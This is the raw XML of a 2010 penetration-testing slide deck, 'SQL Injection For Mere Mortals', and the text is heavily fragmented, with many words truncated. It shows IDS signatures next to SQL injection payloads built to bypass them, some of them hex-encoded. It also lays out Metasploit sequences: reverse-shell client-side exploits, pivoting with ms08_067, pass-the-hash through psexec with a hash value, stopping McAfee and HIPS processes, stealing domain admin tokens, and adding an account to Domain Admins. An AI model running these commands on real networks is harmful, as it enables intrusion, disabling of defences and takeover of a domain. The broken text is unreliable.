                  <a:srgbClr val="4c4c4c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5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Client-Side Fil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erver-side Alphanumeric Fil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1 lik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Here we are doing an “or true,” although this time we are using the “like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comparison instead of the “=” sign. We can use this same technique for the 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variants such as “and 1 like 1” or “and 1 like 2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and 1 lik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and 1 lik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6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Restrictive Black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The key to IDS/IPS evasion is knowing that there is one in plac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With an IPS you can use something like Active Filter Detection or you can try someth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REALLY noisy from  another IP address to see if your IP gets block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Depending of the scope of your engagement you may or may not really be able to identif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when an IDS is in use because it's passive in nat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I've honestly found this side of the house to be more proof-of-concept, and just hav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fun as opposed to something I've actually needed on assessment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6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74" name="Line 4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6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76320" y="2057400"/>
            <a:ext cx="883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Signatur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attempt”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flow: to_server, established; content: “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' or 1=1 --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”; nocase; sid: 1; rev:1;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Bypass Techniqu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2=2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1&lt;2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1 like 1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/**/or /**/2/**/=/**/2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....c'mon everyone name some m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ignature Nega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- Having the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in the signature will cause you to miss attacks that don't utilize the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- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1&lt;2, etc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f this signature is so easily bypassed, what is it actually good fo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nsw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It's great for automated tools and kid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8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 (1)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228600" y="2286000"/>
            <a:ext cx="8915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5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Let me take you back....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8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 (My Opinion)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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="228600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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76320" y="1828800"/>
            <a:ext cx="883908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Signatur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attempt”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flow: to_server, established; pcre: “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(and|or) 1=1 (\-\-|\/\*|\#)/i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”; sid: 1; rev:2;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Bypass Techniqu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2=2%2D%2D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1&lt;2%2D%2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1 like 1%2D%2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/**/or /**/2/**/=/**/2%2D%2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....c'mon everyone name some m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ignature Nega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- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1&lt;2, etc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- Comments like pretty much anything else can be represented in other encoding typ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ex: (%2D%2D = --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- It is possible to attack an sql injection vulnerability without using com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f this signature is so easily bypassed, what is it actually good fo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nsw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gain, it's great for automated tools and kid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9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 (2)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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76320" y="1828800"/>
            <a:ext cx="906768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ignature 3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SELEC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tatement”; flow: to_server, established; pcre:”/select.*from.*(\-\-|\/\*|\#)/i”; sid: 2; rev: 1;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="12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tatement”; flow: to_server, established; pcre:”/union.*(\-\-|\/\*|\#)/i”; sid: 3; rev: 1;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="12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Bypass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http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2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http://[site]/page.asp?id=2 or 2 in (select user)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http://[site]/page.asp?id=-2 %55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6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%65%63%74%20%75%73%65%72),5,6,7%2D%2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http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7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...c'mon everyone name some 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ignature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- Although sigs 3-5 are much better, they don't consider the attacker may use different encoding types such as h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03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 (3-5)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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76320" y="2057400"/>
            <a:ext cx="906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ignature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SELECT statement”; flow: to_server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established; pcre:”/(s|%73)(e|%65)(l|%6C)(e|%65)(c|%63)(t|%74).*(f|%66)(r|%72)(o|%6F)(m|%6D).*(\-\-|\/\*|\#)/i”; sid: 2; rev2;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="12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ignatur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SELECT statement”; flow: to_server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established; pcre:”/(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%45).*(f|%66|%46)(r|%72|%52)(o|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%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)/i”; sid: 2; rev: 3;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="12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At least signature 7 takes into account case sensitivity with hex enco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But..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There are always other encoding types that the attacker can us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685800" y="114300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 (6-7)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1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Practice Your Kung Fu: PH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8" descr="PHPIDS_Smoketest_convert_int.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="2057400"/>
            <a:ext cx="3962160" cy="4572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9" descr="PHPIDS_Smoketest_in_select.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648320" y="2057400"/>
            <a:ext cx="42670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2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Practice Your Kung Fu: PH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10" descr="PHPIDS_Smoketest_in_select_encoded.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="1981080"/>
            <a:ext cx="7848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228600" y="228600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The real trick for each of these techniques is to understand that this is just like ID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evasion in the service based exploitation side of the hous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You have to make sure that your attack actually works. It's easy to bypass an IDS, bu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you can just as easily end up with your attack bypassing the IDS, but not working at al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With this in mind you can mix/match the IDS evasion tricks - it's just a matter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understanding the regex in u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%20or%202%20in%20(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IDS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73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evasion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65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is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6C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easy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65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just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63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ask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74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j0e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20%75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to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73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teach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65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you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72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how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)%2D%2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What is passed to the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2 in (select user)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in comments ("IDS evasion is easy just ask j0e to teach you how")</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c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3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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="228600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udo ./msfconsole            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Be sure to run as root so you can set the LPORT to 44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se exploi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/[name of newest browser, PDF, ActiveX, or fileformat exploit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et PAYLOAD windows/meterpreter/reverse_t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et ExitOnSession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et LHOS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[your public ip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et LPORT 44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exploit -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3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etting in via clinet-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228600" y="20574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vn co http://svn.thepentest.com/social_engineering_toolkit/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ET/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4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T is some next level sh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8" descr="SET.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2666880"/>
            <a:ext cx="5838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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1828800"/>
            <a:ext cx="8839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ivot Attack: Using a compromised host as a launching point to attack other hosts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.....set up standard explo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explo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rou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trl-z &lt;-- background the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back &lt;--- you need to get to main msf&gt; prom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Now set up Pivot with a route ad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route add 192.168.10.131 255.25.255.0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 &lt;--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Use correct session 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route print &lt;----- verif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use exploit/windows/smb/ms08_067_d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et PAYLOAD windows/shell/bind_t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et RHOST 192.168.10.1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et LPORT 1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trl-z &lt;-- background the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back &lt;--- you need to get to main msf&gt; prom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Run auxillaries &amp; exploits through your piv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use scanner/smb/ver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et RHOSTS 192.168.10.1/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ru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5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Pivoting into the LAN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ar-SA" sz="32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228600" y="2286000"/>
            <a:ext cx="8915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Step 1: Tell customer you are 31337 security profes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ustomers only applied patches if it fixed something on the syste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It was common practice NOT to apply system updates that didn't fix a problem you we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experiencing on a system (WTF ARE YOU DOING - YOU MIGHT BREAK SOMETHING!!!!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Step 2: Scan customer network with ISS or Nessus if you were a renega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ustomers didn't apply patches, and rarely even had firewalls and IDSs back t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You know you only ran ISS because it had nice reports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Step 3: Break out your uber 31337 warez and 0wn it all!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You only kept an exploit archive to save time (Hack.co.za was all you needed back the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If you could read the screen you could 0wn the network!!!!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6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Penetration Testing Was Easy....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228600" y="2971800"/>
            <a:ext cx="88390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Can’t get on the network?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NO DHCP – static IP addr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DHCP MAC Address reserv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Port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NA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6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Common LAN Security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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2514600"/>
            <a:ext cx="883908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Can’t get on the network?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NO DHCP – static IP addr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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Steal valid IP address from h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DHCP MAC Address reserv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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Steal valid MAC addr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Port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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Steal valid MAC/IP addr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NA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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Look for 802.1x exceptions such as printers, VoIP ph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6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Common LAN Security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228600" y="2057400"/>
            <a:ext cx="8839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Can’t get on the network????? Jump into the voice V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wget http://www.candelatech.com/~greear/vlan/vlan.1.9.tar.g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tar -zxvf vlan.1.9.tar.g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d v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tshark -i eth0 -v -v "ether host 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2000 or ether[20:2] = 0x2000)" | grep vo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vconfig add eth0 200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# 200 is Voice VLAN ID in thi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ifconfig eth0.200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# Verify new interface was cre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dhcpd -d -t 10 eth0.200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# Try to get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Voiphopper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voiphopper.sourceforge.net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7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ypassing NAC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228600" y="2057400"/>
            <a:ext cx="88390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:\set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Use SET to get domain information and user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view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 NET VIEW to get computers in the users domain and other dom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view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 NET VIEW to get computers in other dom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user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 NET USER to get local users on the computer you are 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user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l users in the current user's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localgroup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 NET LOCALGROUP to get the local groups on the comput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localgroup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 NET LOCALGROUP to get the domain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localgroup administrators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l users in the local administrators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localgroup administrators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l users in the domain administrators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group "Company Admins"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l users in the "Company Admins"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user "joe.mccray"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l info about this u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ltest /dclist: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List Domain Controllers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Basically browsing network neighborhood, and querying Active Directory will always be considered legitimate traffi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to an NIPS so you can use NET commands to enumerate  a network without port scan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8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457200" y="127152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6600"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Enumerating The Internal Network Against NIPS/HI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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2011320"/>
            <a:ext cx="883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ome commands to identify a logged in u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BTSTAT -a remotecomputer | FIND "&lt;03&gt;" | FIND /I /V "remotecomputer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WMIC /Node:remotecomputer ComputerSystem Get User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LOGGEDON -L \\remotecompu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EXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name 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EXEC \\remotecomputer NET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EXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username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8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ooking Around the Network For A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28600" y="2011320"/>
            <a:ext cx="883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moking some MSF hash: Moving around the network using password has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use exploit/windows/smb/psexe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et RHOST 192.168.10.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et SMBUser administ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et SMBPass 01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537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et PAYLOAD windows/shell/reverse_t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et LHOST 192.168.10.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explo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9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ving Around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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2133720"/>
            <a:ext cx="8839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1.  Stop the overall AV Fra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"McAfee Framework Service"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2.  Stop the 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entercepta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fire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3.  McAfee Proc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UdaterU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TB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Mcshie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VsTskMg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shst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4.  HIPS Proc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firet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603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304920" y="1271520"/>
            <a:ext cx="8534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Killing The HIPS (as SYSTEM with “at” command)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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="2971800"/>
            <a:ext cx="548640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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2133720"/>
            <a:ext cx="8839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1.  Stop the overall AV Fra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"McAfee Framework Service"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2.  Stop the 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entercepta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fire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3.  McAfee Proc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UdaterU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TB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Mcshie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VsTskMg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shst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4.  HIPS Proc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firet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61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457200" y="1271520"/>
            <a:ext cx="8458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Killing The HIPS (as SYSTEM with Metasploit)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Picture 8" descr="getsystem.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819520" y="2666880"/>
            <a:ext cx="6029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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2011320"/>
            <a:ext cx="883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tealing a domain administrator's token.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&gt; use incogni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&gt; list_tokens -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&gt; impersonate_token "domain\\user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&gt; execute -c -H -f cmd -a "/k" -i -t &lt;--- Use the -t to use your impersonated tok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 &gt; list_tokens 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 &gt; impersonate_token "DOMAIN\\Domain Admins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&gt; execute -c -H -f cmd -a "/k" -i -t &lt;--- Use the -t to use your impersonated tok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Add yourself to the Domain Admin's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c:\net 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r j0e j0eR0ck$ /domain /ad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c:\net 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localgroup administrators j0e /domain /ad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61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Owning Th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Picture 8" descr="::::Picture 1.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419720" y="4419720"/>
            <a:ext cx="441936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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2011320"/>
            <a:ext cx="883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I have 1- 2 page defensive docs for every attack I covered tod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627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228600" y="2286000"/>
            <a:ext cx="8915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7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698120"/>
            <a:ext cx="822960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f you were Ub3r 31337 you did it like this....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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="25146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Toll Free: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1-866-892-21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Email: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joe@learnsecurityonlin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Twitter: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twitter.com/j0emccr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LinkedIn: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www.linkedin.com/in/joemccr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63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60948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"/>
              </a:rPr>
              <a:t>Holla @ Me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457200" y="274320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7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Port Scan &amp; Banner Grab The Target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4114800" cy="457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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2028960"/>
            <a:ext cx="436248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457200" y="274320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Get your exploit code...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228600" y="2286000"/>
            <a:ext cx="4343400" cy="4341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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="22860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0e</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-08-01T22:01:22Z</dcterms:modified>
  <cp:revision>89</cp:revision>
  <dc:subject/>
  <dc:title>SQL Injection  For Mere Mortals</dc:title>
</cp:coreProperties>
</file>